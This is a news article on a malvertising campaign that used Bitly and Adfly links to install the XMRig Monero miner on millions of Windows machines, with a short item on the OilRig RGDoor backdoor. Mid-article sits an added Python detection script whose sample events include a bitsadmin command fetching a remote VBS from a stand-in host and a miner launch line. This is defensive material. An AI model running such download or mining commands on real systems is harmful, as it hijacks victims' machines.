Millions of machines download cryptominer after users click on devious link

News by Bradley Barth

A newly discovered malicious URL redirection campaign that infects users with the XMRig Monero cryptocurrency miner has already victimised users between 15 and 30 million times, researchers have reported.

Operating for less than five months, the campaign has hit countries in southeast Asia, northern Africa and South America particularly hard, according to a 24 January blog post from Palo Alto Networks' Unit 42 threat research team. Telemetry data indicates that over 3.5 million victims are based in Thailand alone, with Vietnam (more than 1.8 million) and Egypt (roughly 1.1 million) the next most frequently attacked geographic targets.

The attacks are generally carried out by combining redirection services with the URL shortener Bitly, in order to present deceitful malvertising links on various legitimate websites. These advertisements were delivered via Adfly, an ad-based redirection service.

"It appears that Adfly is the method of distribution to unwitting users, while Bitly is being abused by the malware authors to eventually download XMRig," explained Christopher Budd, senior threat communications manager at Palo Alto, in an email interview with SC Media US. (Budd noted that, upon disclosure, Bitly removed the offending URLs in a timely fashion.)

Website visitors who click on these shortened links believe they are downloading advertised files, updates or services (e.g. file sharing services), but they are actually being redirected to another domain that uses an infection chain to download XMRig, a legitimate mining tool that in this case is being used unethically to secretly harness victims' processing power.

The infection process typically starts with the download of a malicious executable that in turn drops a VBS file and an LNK file (the latter for persistence). The VBS file then leverages various HTTP redirection services (prior to 20 October 2017, it was leveraging Microsoft Windows' BITSAdmin tool) to download and execute another remote VBS file. This secondary VBS file fingerprints the infected machine and then installs the appropriate version of XMRig.
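The chain described above (a dropped VBS, an LNK for persistence, a BITSAdmin download from a script host and the miner launch) expressed as simple endpoint detection logic over constructed Sysmon-style events. This is an added illustration, not code from Unit 42 or the article; the events, hostnames, paths and file names are placeholders and not indicators from the campaign.

```python
import re

# Constructed Sysmon-style endpoint events (not real telemetry); hosts/paths are placeholders.
SAMPLE_EVENTS = [
    {"kind": "proc", "image": r"C:\Users\alice\Downloads\Update_Setup.exe",
     "parent": r"C:\Program Files\Browser\browser.exe", "cmdline": "Update_Setup.exe"},
    {"kind": "file", "image": r"C:\Users\alice\Downloads\Update_Setup.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.lnk"},
    {"kind": "proc", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Users\alice\Downloads\Update_Setup.exe",
     "cmdline": r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\svc.vbs"},
    {"kind": "proc", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"bitsadmin /transfer j /download http://redirect.example/s2.vbs C:\Users\alice\AppData\Local\Temp\s2.vbs"},
    {"kind": "proc", "image": r"C:\Users\alice\AppData\Roaming\xmrig.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "xmrig.exe -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER"},
    {"kind": "proc", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe notes.txt"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
USER_WRITABLE = ("\\downloads\\", "\\appdata\\", "\\temp\\")   # lowercase path fragments
STARTUP_DIR = "\\start menu\\programs\\startup\\"

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, event) pairs for each stage of the dropper -> VBS -> miner chain."""
    hits = []
    for e in events:
        img, parent, cmd = basename(e["image"]), basename(e.get("parent", "")), e.get("cmdline", "")
        if e["kind"] == "file":
            # LNK written to the Startup folder: the persistence mechanism the report describes
            p = e["path"].lower()
            if STARTUP_DIR in p and p.endswith(".lnk"):
                hits.append(("lnk_startup_persistence", e))
            continue
        # Script host running a .vbs from a user-writable directory (the dropped first-stage script)
        if img in SCRIPT_HOSTS and ".vbs" in cmd.lower() and any(d in cmd.lower() for d in USER_WRITABLE):
            hits.append(("vbs_from_user_writable_dir", e))
        # Script host driving bitsadmin to fetch a remote file over HTTP (second-stage download)
        if img == "bitsadmin.exe" and parent in SCRIPT_HOSTS and re.search(r"/transfer\b.*https?://", cmd, re.I):
            hits.append(("bitsadmin_download_from_script", e))
        # Miner binary (or a stratum pool URL) launched directly by the script host
        if parent in SCRIPT_HOSTS and ("xmrig" in img or "stratum+tcp://" in cmd.lower()):
            hits.append(("miner_spawned_by_script", e))
    return hits
```

Each rule on its own is noisy in a real fleet; the value is in seeing all four fire in sequence from the same parent chain on one host.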

Researchers have already identified over 250 unique Windows-based executables used in this campaign, more than half of which were downloaded from 4sync, an online cloud storage provider. In addition to executing the cryptominer via VBS files, the malware also uses XMRig proxy services to hide the mining pool destination and uses Nicehash, a marketplace that connects customers who wish to buy or sell hashing processing power.

Because Bitly clicks can be tracked, Unit 42 researchers were able to identify roughly 15 million redirections as a result of this campaign. However, fewer than half of the observed XMRig campaign samples use Bitly, leading Palo Alto researchers to conclude that the actual number of malicious redirects is likely closer to 30 million.

"Monero mining campaigns are certainly not a new development... However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time," wrote blog post author and Palo Alto threat intelligence analyst Josh Grunzweig. "By targeting random end-users via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale."

In a separate blog post published yesterday, Unit 42 revealed that the Iran-linked APT group known as OilRig clandestinely installed an Internet Information Services (IIS) backdoor called RGDoor on the web servers of eight Middle Eastern government organisations, as well as one financial institution and one educational institution.

The researchers believe the backdoor was installed as an insurance measure in case these institutions discovered that they had been previously compromised and infected with a malicious webshell called TwoFace. In such a scenario, the attackers would still have access to the web servers, even if TwoFace was removed.

Ilia Kolochenko, CEO of web security company High-Tech Bridge, comments: "With the steady growth and popularity of digital currencies, we should expect continuous and persistent growth of attacks targeting the wallets and/or installing malware to mine the coins.

"Unlike credit cards, PayPal or bank accounts, digital currencies are a unique opportunity for cyber-criminals to use stolen [digital] money without risks of being halted or having their money frozen. Law enforcement and governments have virtually no control over the digital coins and cannot intervene in the game at the moment. Therefore, using all previously available and some emerging techniques of phishing and drive-by-download attacks, cyber-criminals will likely focus their efforts on cryptocurrencies in the near future."
